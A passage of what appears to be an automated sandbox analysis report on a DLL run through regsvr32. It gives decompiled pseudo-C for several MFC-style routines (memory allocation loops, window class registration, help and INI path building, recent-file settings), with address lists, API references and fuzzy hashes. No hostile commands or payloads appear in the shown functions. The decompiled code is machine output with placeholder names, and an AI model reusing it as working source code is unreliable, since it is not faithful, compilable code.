						__imp__CoTaskMemAlloc(_t181,  *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x50)))));
						 *(_t252 + 0x14) = _t181;
						E1001AB60(_t181, 0,  *(_t252 + 0x10) +  *(_t252 + 0x10) * 4 << 3);
						E100134A2( *((intOrPtr*)(_t252 + 0x50)));
						E10012ECC( *((intOrPtr*)(_t252 + 0x50)));
						L21:
						 *((intOrPtr*)(_t254 - 0x14)) = 0;
						if( *(_t252 + 0x10) > 0) {
							_t198 = 0;
							do {
								_t160 = E10045FEF(0x1c);
								 *((intOrPtr*)(_t254 - 0x18)) = _t160;
								 *(_t254 - 4) = 1;
								if(_t160 == 0) {
									_t161 = 0;
								} else {
									_t161 = E1003DAF9(_t160, 0xa);
								}
								 *(_t254 - 4) =  *(_t254 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t254 - 0x14)) =  *((intOrPtr*)(_t254 - 0x14)) + 1;
								 *((intOrPtr*)(_t198 +  *(_t252 + 0x14) + 0x24)) = _t161;
								_t198 = _t198 + 0x28;
							} while ( *((intOrPtr*)(_t254 - 0x14)) <  *(_t252 + 0x10));
						}
						_t208 =  *((intOrPtr*)(_t254 - 0x28));
						if(_t208 != 0) {
							_t150 =  *((intOrPtr*)(_t254 - 0x2c));
							if(_t150 > 0) {
								 *((intOrPtr*)(_t254 - 0x18)) = _t150;
								 *((intOrPtr*)(_t254 - 0x10)) = _t208 + 0x24;
								do {
									_t197 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t254 - 0x10)))) + 4));
									while(_t197 != 0) {
										_t158 = _t197;
										_t197 =  *_t197;
										 *((intOrPtr*)( *_t252 + 8))( *((intOrPtr*)(_t158 + 8)), 1);
									}
									E1003DB38( *((intOrPtr*)( *((intOrPtr*)(_t254 - 0x10)))));
									_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t254 - 0x10))));
									if(_t211 != 0) {
										 *((intOrPtr*)( *_t211 + 4))(1);
									}
									 *((intOrPtr*)(_t254 - 0x10)) =  *((intOrPtr*)(_t254 - 0x10)) + 0x28;
									_t126 = _t254 - 0x18;
									 *_t126 =  *((intOrPtr*)(_t254 - 0x18)) - 1;
								} while ( *_t126 != 0);
							}
							__imp__CoTaskMemFree( *((intOrPtr*)(_t254 - 0x28)));
						}
						L37:
						_t136 =  *((intOrPtr*)(_t254 - 0x20));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t254 - 0xc));
				return _t136;
			}

0x10013136
0x10013143
0x1001314e
0x10013154
0x10013157
0x10013284
0x10013289
0x100132a2
0x100132a7
0x100132bb
0x100132c0
0x100132d2
0x100132d8
0x100132de
0x100132e5
0x100132e8
0x100132ef
0x100132f4
0x100132f7
0x10013304
0x1001330b
0x1001330e
0x10013315
0x10013318
0x10013328
0x1001332c
0x10013344
0x10013347
0x1001334d
0x10013354
0x10013357
0x1001335a
0x10013362
0x10013367
0x1001336a
0x10013380
0x10013383
0x10013386
0x10013389
0x1001338c
0x1001338f
0x10013395
0x00000000
0x1001336c
0x1001336c
0x10013372
0x10013372
0x00000000
0x1001332e
0x1001332e
0x10013334
0x10013337
0x10013337
0x1001332c
0x1001328b
0x1001328b
0x1001328b
0x1001315d
0x1001315d
0x1001316c
0x10013171
0x10013174
0x1001317a
0x10013180
0x10013181
0x10013188
0x1001318d
0x1001318f
0x10013195
0x10013198
0x1001319b
0x100131a0
0x100131a6
0x100131a8
0x100131bc
0x100131bf
0x100131c5
0x100131c5
0x100131c8
0x100131ce
0x100131ce
0x100131d3
0x100131d9
0x100131de
0x100131e1
0x100131ef
0x100131e3
0x100131e3
0x100131e8
0x100131e8
0x100131f1
0x100131f5
0x100131f8
0x100131fe
0x10013204
0x1001320b
0x10013213
0x10013228
0x10013215
0x10013215
0x10013217
0x1001321a
0x1001321d
0x10013220
0x10013223
0x10013223
0x1001322d
0x10013234
0x1001323f
0x10013245
0x10013248
0x1001324e
0x10013252
0x1001325b
0x10013267
0x10013272
0x1001327a
0x10013398
0x1001339b
0x1001339e
0x100133a0
0x100133a2
0x100133a4
0x100133aa
0x100133af
0x100133b6
0x100133c3
0x100133b8
0x100133bc
0x100133bc
0x100133c8
0x100133cc
0x100133cf
0x100133d6
0x100133d9
0x100133a2
0x100133de
0x100133e3
0x100133e5
0x100133ea
0x100133ef
0x100133f2
0x100133f5
0x100133fa
0x100133fd
0x10013403
0x10013405
0x1001340e
0x1001340e
0x10013418
0x10013420
0x10013424
0x1001342a
0x1001342a
0x1001342d
0x10013431
0x10013431
0x10013431
0x100133f5
0x10013439
0x10013439
0x1001343f
0x1001343f
0x1001343f
0x10013174
0x10013448
0x10013450

APIs

__EH_prolog.LIBCMT ref: 10013136
CoTaskMemAlloc.OLE32(?), ref: 10013252
CoTaskMemFree.OLE32(?), ref: 10013439

Strings

, xrefs: 1001330E
(, xrefs: 1001342D

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID: $(
API String ID: 1522537378-55695022
Opcode ID: 6bf44e8b8e9e3003d1dd804c993cfca0c346f60ed3d40a48e05b044c6e1cd2a4
Instruction ID: 07900b97e62f8485eec6965e0e933414401ec2b5f48f2274b60574dbcd23ec51
Opcode Fuzzy Hash: 6bf44e8b8e9e3003d1dd804c993cfca0c346f60ed3d40a48e05b044c6e1cd2a4
Instruction Fuzzy Hash: 4DB10970A006099FCB14CFA8C885AAEFBF5FF88304F208559E456EB251DB71E985CF60

Uniqueness

Uniqueness Score: -1.00%

Function 100426CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100426CC(intOrPtr* __ecx) {
				struct HWND__* _v36;
				struct HWND__* _v40;
				signed char _v44;
				void* _v48;
				long _t33;
				long _t41;
				struct HWND__* _t46;
				signed char _t58;
				intOrPtr* _t61;
				signed int _t62;
				void* _t67;
				intOrPtr _t69;
				intOrPtr* _t70;

				_t70 = __ecx;
				_t67 = E1004633E();
				if(_t67 != 0) {
					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
						 *((intOrPtr*)(_t67 + 0x20)) = 0;
					}
				}
				_t61 =  *((intOrPtr*)(_t70 + 0x30));
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 0x50))();
					 *((intOrPtr*)(_t70 + 0x30)) = 0;
				}
				_t62 =  *(_t70 + 0x34);
				_t58 = 1;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(_t58);
				}
				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
				if(( *(_t70 + 0x24) & _t58) != 0) {
					_t69 =  *((intOrPtr*)(E100648FB() + 0xcc));
					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
						E1001AB60( &_v48, 0, 0x2c);
						_t46 =  *(_t70 + 0x1c);
						_v40 = _t46;
						_v36 = _t46;
						_v48 = 0x28;
						_v44 = _t58;
						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
					}
				}
				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
				E10041EDF(_t70);
				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
					if(_t41 != 0) {
						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
					}
				}
				E10041FF6(_t70);
				return  *((intOrPtr*)( *_t70 + 0xa4))();
			}

0x100426d5
0x100426dc
0x100426e2
0x100426e7
0x1004270c
0x1004270c
0x10042712
0x10042714
0x10042714
0x10042712
0x10042717
0x1004271c
0x10042720
0x10042723
0x10042723
0x10042726
0x1004272d
0x1004272e
0x10042733
0x10042733
0x10042736
0x1004273d
0x10042744
0x1004274c
0x1004275c
0x10042761
0x10042767
0x1004276a
0x10042770
0x1004277f
0x10042785
0x10042785
0x1004274c
0x10042796
0x1004279c
0x100427aa
0x100427b6
0x100427ba
0x100427c2
0x100427c2
0x100427ba
0x100427ca
0x100427dd

APIs

SendMessageA.USER32 ref: 10042785
GetWindowLongA.USER32(?,000000FC), ref: 10042796
GetWindowLongA.USER32(?,000000FC), ref: 100427A6
SetWindowLongA.USER32(?,000000FC,?), ref: 100427C2

Strings

(, xrefs: 10042770

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: e8fb94d530e63dc8503b4a8e5e4c98a002bca63e0833ffdb7349de75c341d090
Instruction ID: a3ea97a982d9f3bb81ad5760c67f8049ed97875f2ed6a5ea61f62bf65b8c716f
Opcode Fuzzy Hash: e8fb94d530e63dc8503b4a8e5e4c98a002bca63e0833ffdb7349de75c341d090
Instruction Fuzzy Hash: C4319C347046019FDB11EF78C884A5EBBE5FF48650F624279E542D7691DB30E805CB98

Uniqueness

Uniqueness Score: -1.00%

Function 10066B10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E10066B10(void* __ecx, void* __eflags) {
				CHAR* _v8;
				char _v268;
				char _v528;
				char _v784;
				void* __ebp;
				signed char* _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				CHAR* _t54;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;

				_t55 = __ecx;
				_t64 = __ecx;
				_t62 = E10064B8B();
				 *(_t62 + 8) =  *(_t64 + 0x68);
				 *(_t62 + 0xc) =  *(_t64 + 0x68);
				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
				_t35 = E1001BCB9(_t55,  &_v528, 0x2e);
				 *_t35 =  *_t35 & 0x00000000;
				_v8 = _t35;
				E10066C2D( &_v528,  &_v268, 0x104);
				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
					 *((intOrPtr*)(_t64 + 0x88)) = E1001BFD1( &_v268);
				}
				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
					if(E10047973(0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t64 + 0x88)));
					} else {
						_push( &_v784);
					}
					 *((intOrPtr*)(_t64 + 0x78)) = E1001BFD1();
				}
				_t39 =  *((intOrPtr*)(_t64 + 0x78));
				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
				_t63 = _t64 + 0x8c;
				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
					_t54 = _v8;
					lstrcpyA(_t54, ".HLP");
					_t39 = E1001BFD1( &_v528);
					 *_t63 = _t39;
					 *_t54 =  *_t54 & 0x00000000;
				}
				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
					lstrcatA( &_v268, ".INI");
					_t43 = E1001BFD1( &_v268);
					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
					return _t43;
				}
				return _t39;
			}

0x10066b10
0x10066b1c
0x10066b23
0x10066b2d
0x10066b33
0x10066b41
0x10066b50
0x10066b55
0x10066b5a
0x10066b6c
0x10066b79
0x10066b88
0x10066b88
0x10066b91
0x10066bab
0x10066bb6
0x10066bad
0x10066bb3
0x10066bb3
0x10066bc2
0x10066bc2
0x10066bc5
0x10066bc8
0x10066bd1
0x10066bd7
0x10066bd9
0x10066be2
0x10066bef
0x10066bf4
0x10066bf6
0x10066bf9
0x10066c01
0x10066c0f
0x10066c1c
0x10066c22
0x00000000
0x10066c22
0x10066c2c

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10066B41

Part of subcall function 10066C2D: lstrlenA.KERNEL32(?,?,?,10047A2F,?,00000000,00000000), ref: 10066C64

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 10066BE2
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 10066C0F

Strings

.INI, xrefs: 10066C09
.HLP, xrefs: 10066BDC

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 17ab7e76cb9f6d0f33568ba2a7b2da0cad81f0741cc6f0ca8fa17129cd213c42
Instruction ID: da5cb7cffda04385aa5a7e4bfe10e643cc407e452f950c7f592e40836c17c8a7
Opcode Fuzzy Hash: 17ab7e76cb9f6d0f33568ba2a7b2da0cad81f0741cc6f0ca8fa17129cd213c42
Instruction Fuzzy Hash: 03316EB58047199FD720DBB4CC85BC6B7ECFB08310F1049AAE189D6151DB70AAC58F50

Uniqueness

Uniqueness Score: -1.00%

Function 10042D02 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10042D02(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				struct HINSTANCE__* _t40;
				CHAR* _t42;

				_t42 = E100648FB() + 0x58;
				_t25 = E10064B8B();
				_t37 = _a8;
				_t40 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
				} else {
					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
				}
				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_t39 = _a12;
					_push( &_v44);
					_v44.hInstance = _t40;
					_v44.hCursor = _t37;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t42;
					if(E10042C61() == 0) {
						L1004FB42(_t39);
					}
				}
				return _t42;
			}

0x10042d12
0x10042d15
0x10042d1a
0x10042d1d
0x10042d22
0x10042d54
0x10042d2e
0x10042d38
0x10042d3e
0x10042d6b
0x10042d73
0x10042d7b
0x10042d80
0x10042d83
0x10042d86
0x10042d89
0x10042d8c
0x10042d92
0x10042d93
0x10042d96
0x10042d99
0x10042d9c
0x10042da6
0x10042da8
0x10042da8
0x10042da6
0x10042db3

APIs

wsprintfA.USER32 ref: 10042D38
wsprintfA.USER32 ref: 10042D54
GetClassInfoA.USER32(?,-00000058,?), ref: 10042D63

Strings

Afx:%x:%x:%x:%x:%x, xrefs: 10042D4E
Afx:%x:%x, xrefs: 10042D32

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: 408b721e308e1e4d32b901b84d2c1b5394d8520638409b2b854fbde4883a4a4c
Instruction ID: 24e9d7785c89b9b77412548477f0a2ccf8b49900e6688a035561fdd766feb9e1
Opcode Fuzzy Hash: 408b721e308e1e4d32b901b84d2c1b5394d8520638409b2b854fbde4883a4a4c
Instruction Fuzzy Hash: 89214D71E0021AAFDB01DF99CC84DDEBBB9FF49254B10402AF909E3211E7309A51DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10041038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10041038(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t10;
				void* _t11;
				struct HWND__* _t13;
				struct HWND__* _t16;
				struct HWND__** _t23;
				void* _t24;

				_t23 = _a4;
				_t24 = __ecx;
				if(E10042888(__ecx, _t23) != 0) {
					L12:
					_t10 = 1;
					return _t10;
				}
				_t11 = E100437B8(__ecx);
				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
					if(_t23[1] != 0x100) {
						L13:
						return E10044998(_t23);
					}
					_t13 = _t23[2];
					if(_t13 == 0x1b || _t13 == 3) {
						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || L1004E36B( *_t23, ?str?) == 0) {
							goto L13;
						} else {
							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

0x1004103a
0x1004103e
0x10041048
0x100410bf
0x100410c1
0x00000000
0x100410c1
0x1004104c
0x10041053
0x10041066
0x100410c4
0x00000000
0x100410c7
0x10041068
0x1004106e
0x10041081
0x00000000
0x10041093
0x10041098
0x100410a0
0x100410b9
0x00000000
0x00000000
0x00000000
0x00000000
0x100410a0
0x00000000
0x00000000
0x00000000
0x1004105b
0x00000000
0x1004105b

APIs

GetWindowLongA.USER32(?,000000F0), ref: 10041079
GetDlgItem.USER32(?,00000002), ref: 10041098
IsWindowEnabled.USER32(00000000), ref: 100410A3
SendMessageA.USER32 ref: 100410B9

Strings

Edit, xrefs: 10041083

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: 78817a305c2fcc47e0475af63de774f7d33f83c3b350a3f7917a22e8f0694ecc
Instruction ID: 5c153cda6946d1d5d451f4713c5ccd853ee7c53becef0eccf7fc231bb7264c56
Opcode Fuzzy Hash: 78817a305c2fcc47e0475af63de774f7d33f83c3b350a3f7917a22e8f0694ecc
Instruction Fuzzy Hash: 5E01A134300682BAEB29DA20CC09BDAA7E5FB40791F314639F501D30E1DBE1ECC0CA58

Uniqueness

Uniqueness Score: -1.00%

Function 10062CFD Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E10062CFD(void* __ecx) {
				intOrPtr _t14;
				intOrPtr* _t16;
				intOrPtr _t22;
				void* _t26;
				void* _t28;

				E1001A9E0(0x10076916, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *((intOrPtr*)(_t28 + 8)) != 0) {
					_t22 = E10045FEF(0x20);
					 *((intOrPtr*)(_t28 - 0x10)) = _t22;
					 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
					if(_t22 == 0) {
						_t16 = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t28 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t16 = E10047AE3(_t22);
					}
					 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t26 + 0xa8)) = _t16;
					 *((intOrPtr*)( *_t16 + 0xc))();
				}
				_t14 = E100637D7(_t26, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t26 + 0xb4)) = _t14;
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t14;
			}

0x10062d02
0x10062d07
0x10062d0d
0x10062d0f
0x10062d19
0x10062d1b
0x10062d1e
0x10062d24
0x10062d3e
0x10062d26
0x10062d26
0x10062d28
0x10062d2b
0x10062d30
0x10062d35
0x10062d37
